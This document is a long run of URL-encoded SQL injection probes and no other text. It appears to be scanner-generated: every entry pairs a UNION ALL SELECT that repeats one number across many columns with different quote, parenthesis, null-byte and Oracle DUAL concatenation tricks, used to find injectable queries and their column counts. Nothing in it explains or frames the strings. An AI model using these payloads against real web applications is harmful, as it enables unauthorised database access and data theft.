-4180%22%20UNION%20ALL%20SELECT%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%2C%201433%00%20AND%20%22symg%22%20LIKE%20%22symg -9456%22%20UNION%20ALL%20SELECT%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%00%20AND%20%22HOct%22%20LIKE%20%22HOct -6512%22%20UNION%20ALL%20SELECT%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%00%20AND%20%22YhaA%22%20LIKE%20%22YhaA -1992%29%20WHERE%203127%3D3127%20UNION%20ALL%20SELECT%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%00 -8165%29%20WHERE%205457%3D5457%20UNION%20ALL%20SELECT%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%00 -4897%29%20WHERE%208093%3D8093%20UNION%20ALL%20SELECT%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%2C%208093%00 -8010%29%20WHERE%206157%3D6157%20UNION%20ALL%20SELECT%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%2C%206157%00 -6291%29%20WHERE%205655%3D5655%20UNION%20ALL%20SELECT%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%00 -4998%29%20WHERE%202921%3D2921%20UNION%20ALL%20SELECT%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%2C%202921%00 -3671%29%20WHERE%205033%3D5033%20UNION%20ALL%20SELECT%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%2C%205033%00 -7033%29%20WHERE%209830%3D9830%20UNION%20ALL%20SELECT%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%2C%209830%00 -9617%29%20WHERE%209682%3D9682%20UNION%20ALL%20SELECT%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%2C%209682%00 -2193%29%20WHERE%201530%3D1530%20UNION%20ALL%20SELECT%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%2C%201530%00 -8422%27%29%20WHERE%203702%3D3702%20UNION%20ALL%20SELECT%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%00 -3828%27%29%20WHERE%207981%3D7981%20UNION%20ALL%20SELECT%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%00 -2234%27%29%20WHERE%206304%3D6304%20UNION%20ALL%20SELECT%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%2C%206304%00 -4541%27%29%20WHERE%202548%3D2548%20UNION%20ALL%20SELECT%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%2C%202548%00 -8905%27%29%20WHERE%204203%3D4203%20UNION%20ALL%20SELECT%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%00 -5112%27%29%20WHERE%205666%3D5666%20UNION%20ALL%20SELECT%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%2C%205666%00 -8249%27%29%20WHERE%203346%3D3346%20UNION%20ALL%20SELECT%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%2C%203346%00 -8525%27%29%20WHERE%204487%3D4487%20UNION%20ALL%20SELECT%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%00 -2145%27%29%20WHERE%205761%3D5761%20UNION%20ALL%20SELECT%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%2C%205761%00 -8462%27%29%20WHERE%207871%3D7871%20UNION%20ALL%20SELECT%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%2C%207871%00 -8386%27%20WHERE%203265%3D3265%20UNION%20ALL%20SELECT%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%00 -4834%27%20WHERE%209166%3D9166%20UNION%20ALL%20SELECT%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%2C%209166%00 -2517%27%20WHERE%208459%3D8459%20UNION%20ALL%20SELECT%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%2C%208459%00 -1222%27%20WHERE%208823%3D8823%20UNION%20ALL%20SELECT%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%2C%208823%00 -7103%27%20WHERE%206876%3D6876%20UNION%20ALL%20SELECT%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%00 -8226%27%20WHERE%204809%3D4809%20UNION%20ALL%20SELECT%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%00 -5363%27%20WHERE%208060%3D8060%20UNION%20ALL%20SELECT%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%2C%208060%00 -2274%27%20WHERE%206932%3D6932%20UNION%20ALL%20SELECT%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%2C%206932%00 -9213%27%20WHERE%201937%3D1937%20UNION%20ALL%20SELECT%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%2C%201937%00 -9014%27%20WHERE%207794%3D7794%20UNION%20ALL%20SELECT%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%00 -1549%22%20WHERE%209368%3D9368%20UNION%20ALL%20SELECT%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%00 -5562%22%20WHERE%204832%3D4832%20UNION%20ALL%20SELECT%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%00 -3540%22%20WHERE%205326%3D5326%20UNION%20ALL%20SELECT%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%00 -3246%22%20WHERE%206717%3D6717%20UNION%20ALL%20SELECT%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%00 -5343%22%20WHERE%203688%3D3688%20UNION%20ALL%20SELECT%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%2C%203688%00 -9796%22%20WHERE%208311%3D8311%20UNION%20ALL%20SELECT%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%2C%208311%00 -7788%22%20WHERE%208333%3D8333%20UNION%20ALL%20SELECT%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%00 -4504%22%20WHERE%202682%3D2682%20UNION%20ALL%20SELECT%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%2C%202682%00 -4493%22%20WHERE%202266%3D2266%20UNION%20ALL%20SELECT%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%2C%202266%00 -6135%22%20WHERE%207076%3D7076%20UNION%20ALL%20SELECT%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%2C%207076%00 -3872%27%20%7C%7C%20%28SELECT%202048%20FROM%20DUAL%20WHERE%206332%3D6332%20UNION%20ALL%20SELECT%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%00%20%29%20%7C%7C%20%27 -1535%27%20%7C%7C%20%28SELECT%206328%20FROM%20DUAL%20WHERE%209413%3D9413%20UNION%20ALL%20SELECT%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%00%20%29%20%7C%7C%20%27 -5510%27%20%7C%7C%20%28SELECT%208785%20FROM%20DUAL%20WHERE%201736%3D1736%20UNION%20ALL%20SELECT%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%2C%201736%00%20%29%20%7C%7C%20%27 -4654%27%20%7C%7C%20%28SELECT%206321%20FROM%20DUAL%20WHERE%204220%3D4220%20UNION%20ALL%20SELECT%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%2C%204220%00%20%29%20%7C%7C%20%27 -5458%27%20%7C%7C%20%28SELECT%207708%20FROM%20DUAL%20WHERE%204974%3D4974%20UNION%20ALL%20SELECT%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%00%20%29%20%7C%7C%20%27 -6539%27%20%7C%7C%20%28SELECT%205704%20FROM%20DUAL%20WHERE%202332%3D2332%20UNION%20ALL%20SELECT%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%2C%202332%00%20%29%20%7C%7C%20%27 -2872%27%20%7C%7C%20%28SELECT%201535%20FROM%20DUAL%20WHERE%204477%3D4477%20UNION%20ALL%20SELECT%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%2C%204477%00%20%29%20%7C%7C%20%27 -6878%27%20%7C%7C%20%28SELECT%207358%20FROM%20DUAL%20WHERE%204563%3D4563%20UNION%20ALL%20SELECT%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%00%20%29%20%7C%7C%20%27 -5382%27%20%7C%7C%20%28SELECT%201624%20FROM%20DUAL%20WHERE%206652%3D6652%20UNION%20ALL%20SELECT%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%2C%206652%00%20%29%20%7C%7C%20%27 -2822%27%20%7C%7C%20%28SELECT%205740%20FROM%20DUAL%20WHERE%206994%3D6994%20UNION%20ALL%20SELECT%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%2C%206994%00%20%29%20%7C%7C%20%27 -6801%27%20%7C%7C%20%28SELECT%208529%20WHERE%208395%3D8395%20UNION%20ALL%20SELECT%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%2C%208395%00%20%29%20%7C%7C%20%27 -7753%27%20%7C%7C%20%28SELECT%207754%20WHERE%209481%3D9481%20UNION%20ALL%20SELECT%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%00%20%29%20%7C%7C%20%27 -8305%27%20%7C%7C%20%28SELECT%204063%20WHERE%205862%3D5862%20UNION%20ALL%20SELECT%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%2C%205862%00%20%29%20%7C%7C%20%27 -1017%27%20%7C%7C%20%28SELECT%209375%20WHERE%209806%3D9806%20UNION%20ALL%20SELECT%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%00%20%29%20%7C%7C%20%27 